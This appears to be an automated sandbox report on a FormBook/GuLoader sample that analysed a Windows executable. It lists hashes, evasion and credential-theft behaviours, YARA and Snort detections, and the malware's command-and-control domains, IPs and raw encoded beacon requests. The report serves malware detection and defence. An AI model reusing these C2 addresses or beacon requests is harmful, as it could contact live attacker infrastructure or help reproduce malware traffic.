Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Siirtokuitti_006703.exe

Overview

General Information

Sample Name:Siirtokuitti_006703.exe
Analysis ID:878039
MD5:917202e098f68d9b97db1a1f685e8d39
SHA1:adebee937368f6669bce198f93d15c81d8a8bbaf
SHA256:be84718f9896671037fcf972d60ebf25d4a13f9bd8243d56c23ec6d4a89fb580
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • Siirtokuitti_006703.exe (PID: 6032 cmdline: C:\Users\user\Desktop\Siirtokuitti_006703.exe MD5: 917202E098F68D9B97DB1A1F685E8D39)
    • Siirtokuitti_006703.exe (PID: 8416 cmdline: C:\Users\user\Desktop\Siirtokuitti_006703.exe MD5: 917202E098F68D9B97DB1A1F685E8D39)
    • mstsc.exe (PID: 8528 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: B038F39C887BE2A810E20B08613F3B84)
      • RAVCpl64.exe (PID: 7528 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
      • explorer.exe (PID: 5200 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
      • firefox.exe (PID: 8968 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
        • WerFault.exe (PID: 9068 cmdline: C:\Windows\system32\WerFault.exe -u -p 8968 -s 120 MD5: 5C06542FED8EE68994D43938E7326D75)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x82355:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x81df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x82457:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x825cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x74c4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x8104c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x880b7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x8907a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x89320:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x7507f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x82557:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x18355:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x17df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x18457:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x185cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xac4a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1704c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x1e0b7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1f07a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 8 entries
      No Sigma rule has matched
      Timestamp:192.168.11.2023.104.137.18549834802031453 05/30/23-11:12:12.677490
      SID:2031453
      Source Port:49834
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2084.32.84.3249805802031453 05/30/23-11:10:30.779905
      SID:2031453
      Source Port:49805
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20130.185.109.7749781802031412 05/30/23-11:09:09.951790
      SID:2031412
      Source Port:49781
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.106.208.349858802031412 05/30/23-11:13:32.368611
      SID:2031412
      Source Port:49858
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.104.137.18549834802031412 05/30/23-11:12:12.677490
      SID:2031412
      Source Port:49834
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20130.185.109.7749842802031453 05/30/23-11:12:39.001168
      SID:2031453
      Source Port:49842
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20130.185.109.7749781802031453 05/30/23-11:09:09.951790
      SID:2031453
      Source Port:49781
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20154.84.88.10849813802031449 05/30/23-11:10:58.323973
      SID:2031449
      Source Port:49813
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.106.208.349858802031453 05/30/23-11:13:32.368611
      SID:2031453
      Source Port:49858
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20154.84.88.10849813802031412 05/30/23-11:10:58.323973
      SID:2031412
      Source Port:49813
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.104.137.18549773802031453 05/30/23-11:08:43.535354
      SID:2031453
      Source Port:49773
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20154.84.88.10849813802031453 05/30/23-11:10:58.323973
      SID:2031453
      Source Port:49813
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.106.208.349797802031449 05/30/23-11:10:04.022859
      SID:2031449
      Source Port:49797
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20130.185.109.7749842802031412 05/30/23-11:12:39.001168
      SID:2031412
      Source Port:49842
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.104.137.18549773802031412 05/30/23-11:08:43.535354
      SID:2031412
      Source Port:49773
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2084.32.84.3249805802031412 05/30/23-11:10:30.779905
      SID:2031412
      Source Port:49805
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20130.185.109.7749781802031449 05/30/23-11:09:09.951790
      SID:2031449
      Source Port:49781
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.106.208.349858802031449 05/30/23-11:13:32.368611
      SID:2031449
      Source Port:49858
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.201.1.1.161774532023883 05/30/23-11:07:53.444374
      SID:2023883
      Source Port:61774
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.11.20185.106.208.349797802031412 05/30/23-11:10:04.022859
      SID:2031412
      Source Port:49797
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.104.137.18549773802031449 05/30/23-11:08:43.535354
      SID:2031449
      Source Port:49773
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.104.137.18549834802031449 05/30/23-11:12:12.677490
      SID:2031449
      Source Port:49834
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.106.208.349797802031453 05/30/23-11:10:04.022859
      SID:2031453
      Source Port:49797
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20130.185.109.7749842802031449 05/30/23-11:12:39.001168
      SID:2031449
      Source Port:49842
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2084.32.84.3249805802031449 05/30/23-11:10:30.779905
      SID:2031449
      Source Port:49805
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Siirtokuitti_006703.exeReversingLabs: Detection: 37%
      Source: Siirtokuitti_006703.exeVirustotal: Detection: 49%Perma Link
      Source: Yara matchFile source: 00000001.00000002.19420855305.0000000009150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23814214008.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23831783488.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.23832424466.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: http://www.printmyride.store/tchg/Avira URL Cloud: Label: malware
      Source: http://www.cookcollectives.xyz/tchg/?O0qEM=/2jSjcKJMdr4ffgZ+zzkfBSRTsT2SH0igJpEl+3lX4mpJUIOx7Qie7mq5rJzO4NdwHagEWX+5iltx1Pxra2/KdiiiY2yLTCphg==&CF1Ki=UnDuQcdCFs1MNsvYAvira URL Cloud: Label: malware
      Source: http://www.cookcollectives.xyz/tchg/Avira URL Cloud: Label: malware
      Source: http://www.1win-legal1.top/tchg/?O0qEM=hClHY5uPluAt04hxdW9YdRNRHUMh6WFBrIjTpWTjcLdbR+/1RzzDBpsx7TGHnuWwBZdLDpA/Bvgz1IX7r92Uvnz5C/OqUTrjUQ==&CF1Ki=UnDuQcdCFs1MNsvYAvira URL Cloud: Label: malware
      Source: Siirtokuitti_006703.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CarmenJump to behavior
      Source: unknownHTTPS traffic detected: 172.217.18.110:443 -> 192.168.11.20:49759 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.97:443 -> 192.168.11.20:49760 version: TLS 1.2
      Source: Siirtokuitti_006703.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Siirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000649000.00000020.00000001.01000000.00000005.sdmp
      Source: Binary string: wntdll.pdbUGP source: Siirtokuitti_006703.exe, 00000003.00000003.19290237020.00000000375EA000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19283597652.000000003743B000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Siirtokuitti_006703.exe, 00000003.00000003.19290237020.00000000375EA000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19283597652.000000003743B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe
      Source: Binary string: mstsc.pdbGCTL source: Siirtokuitti_006703.exe, 00000001.00000003.19306032866.00000000093B9000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000001.00000003.19304004948.0000000009272000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19325433829.00000000374AE000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19327317521.0000000000061000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mshtml.pdbUGP source: Siirtokuitti_006703.exe, 00000003.00000001.19133084777.0000000000649000.00000020.00000001.01000000.00000005.sdmp
      Source: Binary string: mstsc.pdb source: Siirtokuitti_006703.exe, 00000001.00000003.19306032866.00000000093B9000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000001.00000003.19304004948.0000000009272000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19325433829.00000000374AE000.00000004.00000020.00020000.00000000.sdmp, Siirtokuitti_006703.exe, 00000003.00000003.19327317521.0000000000061000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_004066F3 FindFirstFileW,FindClose,1_2_004066F3
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00405ABE CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405ABE
      Source: C:\Users\user\Desktop\Siirtokuitti_006703.exeCode function: 1_2_00402862 FindFirstFileW,1_2_00402862
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_00343470 FindFirstFileW,FindNextFileW,FindClose,5_2_00343470
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 5_2_003435A5 FindFirstFileW,FindNextFileW,FindClose,5_2_003435A5
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi5_2_00338E50
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi5_2_00338E2F
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi5_2_00334E06

      Networking

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 130.185.109.77 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 84.32.84.32 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.arifsantoso.info
      Source: C:\Windows\explorer.exeNetwork Connect: 183.90.238.43 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.45 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 109.123.121.243 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 162.214.206.200 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 199.192.30.147 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 154.84.88.108 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 216.108.231.108 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 89.31.143.1 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 162.215.249.40 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 172.67.153.163 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 23.104.137.185 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.106.208.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 213.171.195.105 80Jump to behavior
      Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.20:61774 -> 1.1.1.1:53
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49773 -> 23.104.137.185:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49773 -> 23.104.137.185:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49773 -> 23.104.137.185:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49781 -> 130.185.109.77:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49781 -> 130.185.109.77:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49781 -> 130.185.109.77:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49797 -> 185.106.208.3:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49797 -> 185.106.208.3:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49797 -> 185.106.208.3:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 84.32.84.32:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 84.32.84.32:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49805 -> 84.32.84.32:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 154.84.88.108:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 154.84.88.108:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49813 -> 154.84.88.108:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 23.104.137.185:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 23.104.137.185:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 23.104.137.185:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49842 -> 130.185.109.77:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49842 -> 130.185.109.77:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49842 -> 130.185.109.77:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 185.106.208.3:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 185.106.208.3:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49858 -> 185.106.208.3:80
      Source: DNS query: www.minskadue.xyz
      Source: DNS query: www.cookcollectives.xyz
      Source: DNS query: www.zinkiggekis.xyz
      Source: DNS query: www.oleictude.xyz
      Source: Joe Sandbox ViewASN Name: XIRRADE XIRRADE
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=hClHY5uPluAt04hxdW9YdRNRHUMh6WFBrIjTpWTjcLdbR+/1RzzDBpsx7TGHnuWwBZdLDpA/Bvgz1IX7r92Uvnz5C/OqUTrjUQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.1win-legal1.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=DJvKcwNMAiJtEMOFKIZqmDIH4j0MfehpVISF4oayj5HJP/icrRLtFKDL2L4p+A5+/b2o2lLyzfTNwEC6FKsE+wfmOuyyDckdRA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.minskadue.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=Vh+NtSFYOkmwW/joH9vrd5+MSsdMnxV1ssl4yHjdHmi4FIifjhGRd3WP5FLf/k8P5fuqdVgOe83DA0NMx4WBp24AMjol/1MYCA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.marketing-solution.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=9bBjY/6oTKgH1shIYNMDEgJDdV7IeHSSKUh5InR8itKuthEKpcsrZfSerFOqB7XzWJrnUJabB2R375fix7bupMFfJVFvNpSnug==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.tsygy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=/2jSjcKJMdr4ffgZ+zzkfBSRTsT2SH0igJpEl+3lX4mpJUIOx7Qie7mq5rJzO4NdwHagEWX+5iltx1Pxra2/KdiiiY2yLTCphg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.cookcollectives.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.printmyride.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=RUgOIEC2bpKEAb3gt63mE+Z8A/D48vS2kv7pSD36MjRmJGY6VLK565PH5Ya2jxSU9dFBv1ZYes9vP/U9IpvgXfidz0YLsWTogQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.fairbitawayposearisk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=oRufhoY+bc3ycM+VgiODBrp+vj6j24zBH4XRbixJn1DYBt5l7xCYw/uqkQ1xxa9R7WiXu6y4y7mJHWOjUCQ2GcjHOqMUPQqZlA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.dkansai-cp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=27zP+uSjjQlLnilOnGJCOrnozMlpBRLg3OEmXmWOVdAdyewLZJq+JAgQDNVT6O1S8K/UhNHecCZNR/ARSVl+YwbS8ARBrMbIDw==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.comoparardefumar.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=jQDaGZ2OScTGFSP10uKTPyhqI710WSvw2gViBbUugbcSlWDCi533rl6vPGA30o5eyDb36C/pQ3h7az/b16KQNynftoBCqLFM3A==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.albaymedya.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=BJuKMup2GV76y7PN1TAAeEW5uAzDipAxIHnNePHx/XVxjn7DTtYSqvDx4g/JiwsgTds8bJvsGAi/M/AJ9Pl0F9zoyJQ+vWMQHA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.roconsultores.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=zvsOmuV0RkpNj9dmmLvcNYSUCKV3obfROWhQI5uFrAaJab0t5Tdz/8Us64BcH9fOYlnSp9W3WhuAhk0hcdTywJHY62KLeFNtHg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.aurizhon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=k2D3DblF7vL6SN+gu0l7QPzZCDmxseSx80MfaI1OtzxPgAvg61Sn0PlLCTFPQNSP+C41MomAw+jmeQI9bGxtvb+gFV+DCXaP5w==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.solarwachstum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=U7ETdamdP1ZCKOUjEiyRlibAgxYlwKZeBR7oaxwm2PdxgC4EyvOHYU8IW8pd/NQOhWFEBZrGHEgN3MxkyARqzohq8TIPp6MjlQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.ep09.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=mDEdoIjvGdDKka9ru4QwK/GisJWxY9EIyNGATwE/O1GDb08I/XgAMo6lLUTyBtJ+E+b+Hhq9pNT1+wqS6RrKc+0XnVP7aUjPVQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.zinkiggekis.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=4yLegaT1sivciznwGwL+1oWFxAOSGQRZOQeAHXS5UhA0sXonzOuQC/8xHc6XJGn9K9HBDd08hbjXm0qB4TniN4OVF/4Ot7tkHQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.scottsteedley.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=hClHY5uPluAt04hxdW9YdRNRHUMh6WFBrIjTpWTjcLdbR+/1RzzDBpsx7TGHnuWwBZdLDpA/Bvgz1IX7r92Uvnz5C/OqUTrjUQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.1win-legal1.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=DJvKcwNMAiJtEMOFKIZqmDIH4j0MfehpVISF4oayj5HJP/icrRLtFKDL2L4p+A5+/b2o2lLyzfTNwEC6FKsE+wfmOuyyDckdRA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.minskadue.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=Vh+NtSFYOkmwW/joH9vrd5+MSsdMnxV1ssl4yHjdHmi4FIifjhGRd3WP5FLf/k8P5fuqdVgOe83DA0NMx4WBp24AMjol/1MYCA==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.marketing-solution.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=9bBjY/6oTKgH1shIYNMDEgJDdV7IeHSSKUh5InR8itKuthEKpcsrZfSerFOqB7XzWJrnUJabB2R375fix7bupMFfJVFvNpSnug==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.tsygy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=/2jSjcKJMdr4ffgZ+zzkfBSRTsT2SH0igJpEl+3lX4mpJUIOx7Qie7mq5rJzO4NdwHagEWX+5iltx1Pxra2/KdiiiY2yLTCphg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.cookcollectives.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1Host: www.printmyride.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
